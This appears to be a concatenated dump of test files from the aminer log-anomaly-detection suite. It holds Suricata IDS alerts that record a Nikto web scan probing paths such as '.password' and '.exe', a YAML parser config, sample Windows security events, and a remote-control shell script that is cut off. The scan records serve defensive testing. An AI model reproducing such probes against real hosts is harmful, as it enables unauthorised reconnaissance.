(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.612252+0000","flow_id":"1249779632453529.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47100","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.wwwacl","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.616417+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":83,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.132261","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.616417+0000\",\"flow_id\":2152744966841157,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47102,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.UploadServlet\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.616417+0000","flow_id":"2152744966841157.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47102","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.UploadServlet","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.628183+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":84,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.133820","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.628183+0000\",\"flow_id\":486941901094842,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47104,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.PWD\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.628183+0000","flow_id":"486941901094842.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47104","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.PWD","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.634992+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":85,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.135357","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.634992+0000\",\"flow_id\":278614512413618,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47106,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ml\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.634992+0000","flow_id":"278614512413618.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47106","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ml","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.638121+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":86,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.136892","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.638121+0000\",\"flow_id\":2193388242384897,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47108,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.exe\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.638121+0000","flow_id":"2193388242384897.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47108","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.exe","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.641116+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":87,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.138431","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.641116+0000\",\"flow_id\":1061393776952083,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47110,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.listprint\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.641116+0000","flow_id":"1061393776952083.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47110","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.listprint","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.646964+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":88,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.139982","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.646964+0000\",\"flow_id\":403035420023849,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47112,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.link\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.646964+0000","flow_id":"403035420023849.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47112","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.link","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.650090+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":89,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.141521","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.650090+0000\",\"flow_id\":303031401506644,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47114,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.pt\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.650090+0000","flow_id":"303031401506644.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47114","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.pt","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.653055+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":90,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.143056","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.653055+0000\",\"flow_id\":2084777109418518,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47116,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.back\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.653055+0000","flow_id":"2084777109418518.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47116","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.back","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.655279+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":91,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.144597","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.655279+0000\",\"flow_id\":1361650645662792,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47118,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.password\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.655279+0000","flow_id":"1361650645662792.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47118","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.password","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.657354+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":92,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.146146","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.657354+0000\",\"flow_id\":1.24322121737965e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47120,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.php\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.657354+0000","flow_id":"1243221217379650.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47120","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.php","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.659892+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":93,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.147689","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.659892+0000\",\"flow_id\":1976543933501226,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47122,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.tw\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.659892+0000","flow_id":"1976543933501226.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47122","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.tw","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/windows.yml000066400000000000000000000073611500476301700301030ustar00rootroot00000000000000LearnMode: False Log.Encoding: 'utf-8' Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/windows_json_logs/Security_Error.log' - 'file:///tmp/windows_json_logs/Security_Working.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: '' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 2 Parser: - id: machinename type: FixedWordlistDataModelElement name: 'machinename' args: - 'N3IM1703.D03.arc.local' - id: data type: FixedWordlistDataModelElement name: 'data' args: - '' - id: index type: DecimalIntegerValueModelElement name: 'index' - id: categorynumber type: DecimalIntegerValueModelElement name: 'categorynumber' - id: eventid type: DecimalIntegerValueModelElement name: 'eventid' - id: entrytype type: DecimalIntegerValueModelElement name: 'entrytype' - id: source type: VariableByteDataModelElement name: 'source' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&%=+$,/?%#\~ ' - id: non_empty_elem type: VariableByteDataModelElement name: 'non_empty_elem' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZüäö0123456789-_.:;&%=+$,/?%#\~()\r\n\t ' #- id: non_empty_elem # type: AnyByteDataModelElement # name: 'non_empty_elem' # #args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&%=+$,/?%#\~Ä ' - id: empty_elem type: FixedWordlistDataModelElement name: 'empty' args: - '' - id: replacementstrings type: FirstMatchModelElement name: 'replacementstrings' args: - non_empty_elem - empty_elem - id: instanceid type: DecimalIntegerValueModelElement name: 'instanceid' - id: timegenerated type: VariableByteDataModelElement name: 'timegenerated' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&%=+$,/?%#\~ ' - id: timewritten type: VariableByteDataModelElement name: 'timewritten' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&%=+$,/?%#\~ ' - id: username type: FixedWordlistDataModelElement name: 'username' args: - 'NT-AUTORITÄT' - '\\' - 'SYSTEM' - 'Lokaler Dienst' - id: json start: True type: JsonModelElement name: 'model' optional_key_prefix: '_' key_parser_dict: MachineName: machinename Data: data Index: index CategoryNumber: categorynumber EventID: eventid EntryType: entrytype Source: source ReplacementStrings: - replacementstrings InstanceId: instanceid TimeGenerated: timegenerated TimeWritten: timewritten +UserName: username Site: "NULL_OBJECT" Container: "NULL_OBJECT" _empty_list: EMPTY_ARRAY _empty_object: EMPTY_OBJECT Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe json: true type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/windows_json_logs/000077500000000000000000000000001500476301700314265ustar00rootroot00000000000000Security_Error.log000066400000000000000000000042221500476301700350320ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/windows_json_logs{"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":597,"CategoryNumber":12292,"EventID":5058,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["S-1-5-21-1482476501-113007714-839522115-13768","admin-ea","D03","0x4a3e7d","8656","2021-04-22T09:18:20.958953800Z","Microsoft Software Key Storage Provider","UNKNOWN","Microsoft Connected Devices Platform device certificate","%%2500","C:\\Users\\admin-ea\\AppData\\Roaming\\Microsoft\\Crypto\\Keys\\de7cf8a7901d2ad13e5c67c29e5d1662_ccbe96bb-675a-4a22-b29c-5213a99e5b4f","%%2458","0x0"],"InstanceId":5058,"TimeGenerated":"2021-04-22T11:18:22+02:00","TimeWritten":"2021-04-22T11:18:22+02:00","UserName":null,"Site":null,"Container":null} {"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":1956,"CategoryNumber":12554,"EventID":4627,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["S-1-5-18","N3IM1703$","D03","0x3e7","S-1-5-18","SYSTEM","NT-AUTORITT","0x3e7","5","1","1","\r\n\t\t%S-1-5-32-544\r\n\t\t%S-1-1-0\r\n\t\t%S-1-5-11\r\n\t\t%S-1-16-16384"],"InstanceId":4627,"TimeGenerated":"2021-04-28T09:59:47+02:00","TimeWritten":"2021-04-28T09:59:47+02:00","UserName":null,"Site":null,"Container":null} {"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":1956,"CategoryNumber":12554,"EventID":4627,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["S-1-5-18","N3IM1703$","D03","0x3e7","S-1-5-18","SYSTEM","NT-AUTORITT","0x3e7","5","1","1","%S-1-5-32-544%S-1-1-0%S-1-5-11%S-1-16-16384"],"InstanceId":4627,"TimeGenerated":"2021-04-28T09:59:47+02:00","TimeWritten":"2021-04-28T09:59:47+02:00","UserName":null,"Site":null,"Container":null} {"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":12293,"CategoryNumber":13826,"EventID":4799,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["Zugriffssteuerungs-Unterstützungsoperatoren","Builtin","S-1-5-32-579","S-1-5-18","N3IM1703$","D03","0x3e7","0x1680","C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"],"InstanceId":4799,"TimeGenerated":"2021-05-10T09:38:03+02:00","TimeWritten":"2021-05-10T09:38:03+02:00","UserName":null,"Site":null,"Container":null} Security_Working.log000066400000000000000000000011101500476301700353520ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/windows_json_logs{"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":597,"CategoryNumber":12292,"EventID":5058,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["S-1-5-21-1482476501-113007714-839522115-13768","admin-ea","D03","0x4a3e7d","8656","2021-04-22T09:18:20.958953800Z","Microsoft Software Key Storage Provider","UNKNOWN","Microsoft Connected Devices Platform device certificate","%%2500","%%2458","0x0"],"InstanceId":5058,"TimeGenerated":"2021-04-22T11:18:22+02:00","TimeWritten":"2021-04-22T11:18:22+02:00","UserName":null,"Site":null,"Container":null} logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerRemoteControl/000077500000000000000000000000001500476301700257155ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerRemoteControl/aminerRemoteControlDemo.sh000077500000000000000000000176531500476301700330650ustar00rootroot00000000000000#!/bin/bash #removes the 'LogPrefix' sudo aminerremotecontrol --exec "change_config_property(analysis_context, 'LogPrefix', '')" #renames the 'NewMatchPathValueCombo' component to 'NewMatchPathValueComboDetector' sudo aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NewMatchPathValueCombo','NewMatchPathValueComboDetector')" #changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' to False. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', False)" #prints the current list of target_path_list sudo aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'target_path_list')" #adds a new path to the 'NewMatchPathValueComboDetector' component. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'target_path_list', ['/model/IPAddresses/Username', '/model/IPAddresses/IP', 'new/path'])" #changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' to True to start the 